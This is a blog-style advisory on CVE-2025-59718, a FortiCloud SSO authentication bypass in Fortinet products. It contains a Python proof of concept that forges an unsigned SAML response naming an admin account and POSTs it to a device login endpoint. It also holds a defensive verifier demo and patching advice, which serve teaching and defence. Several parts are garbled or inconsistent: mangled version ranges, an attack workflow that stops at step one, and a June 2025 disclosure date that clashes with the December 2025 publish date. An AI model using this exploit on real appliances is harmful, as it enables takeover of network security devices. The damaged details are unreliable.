In June 2025, a serious vulnerability was disclosed in several Fortinet products. Known as CVE-2025-59718, this flaw allows unauthenticated attackers to bypass the FortiCloud Single Sign-On (SSO) login process. If you run FortiOS, FortiProxy, or FortiSwitchManager, this is urgent news. Below, I’ll break down how the bug works, how attackers can exploit it, and what you can do to stay safe.

- Affected FortiSwitchManager versions: 7.2.–7.2.6, 7..–7..5

- Impact: Allows an unauthenticated attacker to bypass FortiCloud SSO authentication by exploiting improper verification of the cryptographic signature on SAML responses (CWE-347, Improper Verification of Cryptographic Signature).
- CVSS Score: To be announced (expected High/Critical)


How the Attack Works

Fortinet devices use SAML (Security Assertion Markup Language) for FortiCloud SSO. FortiCloud acts as the identity provider (IdP): after a user authenticates there, it returns a SAML Response carrying an Assertion about that user, which the browser POSTs to the device. The device acts as the service provider (SP) and is supposed to trust the assertion only after verifying its XML *digital signature* against FortiCloud's signing certificate.

Because of improper verification of that signature, the device can accept an attacker-crafted SAML response as if it had come from FortiCloud, and log the attacker in as whatever account the forged assertion names. The advisory describes the root cause only as improper verification of a cryptographic signature; the example below assumes the simplest case, a response that carries no signature at all.

Attack Workflow

1. Victim visits the FortiOS/Proxy/SwitchManager login via SSO.

Sample Exploit Code

Here’s a simplified Python snippet showing the attack’s core logic: it forges a SAML Response whose assertion names an administrator account, leaves out the <ds:Signature> element entirely, and POSTs it to the login endpoint the way a browser would after an IdP redirect. The endpoint path and the attributes a real device expects vary by product and configuration, so this is a model of the technique rather than a drop-in exploit. (For educational purposes only!)

import requests
import base64
from xml.etree.ElementTree import Element, tostring

# Craft a fake SAML Response that carries no <ds:Signature> at all. A correct
# SP must reject it; the bug class described above is an SP that does not.
def create_forged_saml():
    root = Element('samlp:Response', {
        'xmlns:samlp': 'urn:oasis:names:tc:SAML:2.0:protocol',
        'ID': 'evil-id',
        'Version': '2.0',
        'IssueInstant': '2025-06-10T00:00:00Z'
    })
    # Insert a bogus assertion naming the account the attacker wants to become
    assertion = Element('saml:Assertion', {'xmlns:saml': 'urn:oasis:names:tc:SAML:2.0:assertion'})
    subject = Element('saml:Subject')
    nameid = Element('saml:NameID')
    nameid.text = "admin@target.com"
    subject.append(nameid)
    assertion.append(subject)
    root.append(assertion)
    # No <ds:Signature> tag!
    return base64.b64encode(tostring(root)).decode()

# Target FortiOS SSO endpoint (adjust to the device's actual SAML assertion-consumer URL)
TARGET_URL = 'https://fortidevice.example.com/remote/saml/login'

# Submit the forged SAMLResponse as a browser would POST it back from the IdP
saml = create_forged_saml()
r = requests.post(TARGET_URL, data={"SAMLResponse": saml}, timeout=10)
print(f"Status: {r.status_code}, Content: {r.text[:200]}")
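The forged response above only works against a service provider whose signature check can be skipped. The following is an added example of mine, not code from the original post or from Fortinet, showing that flaw class from the SP side: vulnerable_login validates a signature only when one is present, so the unsigned response the exploit sends is accepted, while hardened_login treats a missing or invalid signature as a rejection and additionally pins issuer and audience. HMAC-SHA256 with a constructed key stands in for XML-DSig and the IdP certificate, and the entity IDs, element IDs and message layout are assumptions for the demo; whether Fortinet's actual defect is exactly this omission is not stated in the advisory text.

```python
"""SP-side view of the bug class: a verifier that checks a signature only when one
is present, beside one that requires and validates it. HMAC-SHA256 stands in for
XML-DSig so this runs on the standard library alone; the control flow is the point."""
import base64
import copy
import hashlib
import hmac
import xml.etree.ElementTree as ET

SAMLP = "urn:oasis:names:tc:SAML:2.0:protocol"
SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
DS = "http://www.w3.org/2000/09/xmldsig#"
for _prefix, _uri in (("samlp", SAMLP), ("saml", SAML), ("ds", DS)):
    ET.register_namespace(_prefix, _uri)

# Constructed demo values (assumptions for this example, not FortiCloud data).
IDP_KEY = b"constructed-idp-signing-key"       # stands in for the pinned IdP signing certificate
EXPECTED_ISSUER = "https://idp.example.com"   # IdP entity ID this SP trusts
EXPECTED_AUDIENCE = "https://sp.example.com"  # this SP's own entity ID

def q(ns, tag):
    """Clark notation ({uri}local) that ElementTree uses for namespaced tags."""
    return f"{{{ns}}}{tag}"

def _signed_bytes(assertion):
    """Bytes the signature covers: the Assertion with any ds:Signature child removed."""
    clone = copy.deepcopy(assertion)
    for sig in clone.findall(q(DS, "Signature")):
        clone.remove(sig)
    return ET.tostring(clone)

def build_response(name_id, issuer=EXPECTED_ISSUER, audience=EXPECTED_AUDIENCE, sign_key=None):
    """Base64 SAMLResponse; sign_key=None leaves the Assertion unsigned, as the exploit does."""
    resp = ET.Element(q(SAMLP, "Response"), {"ID": "_r1", "Version": "2.0"})
    assertion = ET.SubElement(resp, q(SAML, "Assertion"), {"ID": "_a1", "Version": "2.0"})
    ET.SubElement(assertion, q(SAML, "Issuer")).text = issuer
    subject = ET.SubElement(assertion, q(SAML, "Subject"))
    ET.SubElement(subject, q(SAML, "NameID")).text = name_id
    restriction = ET.SubElement(ET.SubElement(assertion, q(SAML, "Conditions")), q(SAML, "AudienceRestriction"))
    ET.SubElement(restriction, q(SAML, "Audience")).text = audience
    if sign_key is not None:
        mac = hmac.new(sign_key, _signed_bytes(assertion), hashlib.sha256).digest()
        sig = ET.SubElement(assertion, q(DS, "Signature"))
        ET.SubElement(sig, q(DS, "SignatureValue")).text = base64.b64encode(mac).decode()
    return base64.b64encode(ET.tostring(resp)).decode()

def tamper(response_b64, new_name_id):
    """Attacker rewrites the NameID of a genuinely signed response; the MAC no longer matches."""
    root = ET.fromstring(base64.b64decode(response_b64))
    root.find(f".//{q(SAML, 'NameID')}").text = new_name_id
    return base64.b64encode(ET.tostring(root)).decode()

def _assertion(response_b64):
    return ET.fromstring(base64.b64decode(response_b64)).find(q(SAML, "Assertion"))

def _signature_valid(assertion, key):
    sig = assertion.find(q(DS, "Signature"))
    if sig is None:
        return False
    try:
        given = base64.b64decode(sig.findtext(q(DS, "SignatureValue")) or "")
    except ValueError:  # binascii.Error is a ValueError
        return False
    expected = hmac.new(key, _signed_bytes(assertion), hashlib.sha256).digest()
    return hmac.compare_digest(given, expected)

def _name_id(assertion):
    return assertion.findtext(f"{q(SAML, 'Subject')}/{q(SAML, 'NameID')}")

def vulnerable_login(response_b64, key=IDP_KEY):
    """Flawed SP: the signature is validated only if one is present, so a response
    that simply omits ds:Signature is never checked at all. Returns the accepted NameID."""
    assertion = _assertion(response_b64)
    if assertion is None:
        return None
    if assertion.find(q(DS, "Signature")) is not None and not _signature_valid(assertion, key):
        return None
    return _name_id(assertion)

def hardened_login(response_b64, key=IDP_KEY):
    """Hardened SP: a missing or invalid signature is a rejection, never a skip; then
    issuer and audience are checked. (Production code also checks InResponseTo,
    NotBefore/NotOnOrAfter and that the signed element is the one being read.)"""
    assertion = _assertion(response_b64)
    if assertion is None or not _signature_valid(assertion, key):
        return None
    if assertion.findtext(q(SAML, "Issuer")) != EXPECTED_ISSUER:
        return None
    if EXPECTED_AUDIENCE not in [a.text for a in assertion.iter(q(SAML, "Audience"))]:
        return None
    return _name_id(assertion)

if __name__ == "__main__":
    forged = build_response("admin@target.com")                    # unsigned, like the exploit
    legit = build_response("alice@example.com", sign_key=IDP_KEY)
    print("vulnerable SP accepts forged:", vulnerable_login(forged))            # admin@target.com
    print("hardened SP rejects forged:  ", hardened_login(forged))              # None
    print("hardened SP accepts legit:   ", hardened_login(legit))               # alice@example.com
    print("hardened SP rejects tampered:", hardened_login(tamper(legit, "admin@target.com")))  # None
```

The one-line difference between the two verifiers is the whole bug: "verify if signed" versus "reject unless verified". Real XML-DSig adds canonicalization and Reference handling that this model leaves out, and those bring their own failure modes (signature wrapping, verifying one element while reading another), so a production SP should also confirm that the element whose signature validated is the same element it takes the NameID from.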

Real-World Dangers

If someone can reach the SSO endpoint (over the internet or from your internal network), they can obtain an administrator session on the appliance in seconds, without any credentials. That exposes not just the device but every network it firewalls, proxies, or manages: an attacker with admin rights on a firewall can rewrite policies, add accounts, capture traffic, and pivot further inside.

Patch immediately

- Upgrade to fixed versions of FortiOS, FortiProxy, and FortiSwitchManager as soon as they are available. Check Fortinet’s advisory page for patch releases.
- Until you can patch, reduce exposure: if FortiCloud SSO login is not in use, disable it; restrict administrative access to trusted management hosts and keep the admin interface off the internet.
- Review administrative logins that arrived via SSO. A forged response means the login was never performed at FortiCloud, so compare device-side SSO admin logins against FortiCloud’s own sign-in records and treat any that have no counterpart as suspicious.

References & Additional Reading

- Fortinet PSIRT Advisory
- National Vulnerability Database: CVE-2025-59718
- Understanding SAML Security

Summary

CVE-2025-59718 is a serious authentication-bypass flaw affecting FortiOS, FortiProxy, and FortiSwitchManager. Because the device does not properly verify the cryptographic signature on SAML responses used for FortiCloud SSO, an attacker can skip authentication and take over the device with a single crafted SAML message.

Patch now and protect your Fortinet devices before attackers do.

*This information is provided for educational purposes only. Do not attempt to exploit systems without explicit authorization.*

Timeline

Published on: 12/09/2025 17:20:11 UTC
Last modified on: 01/14/2026 09:18:16 UTC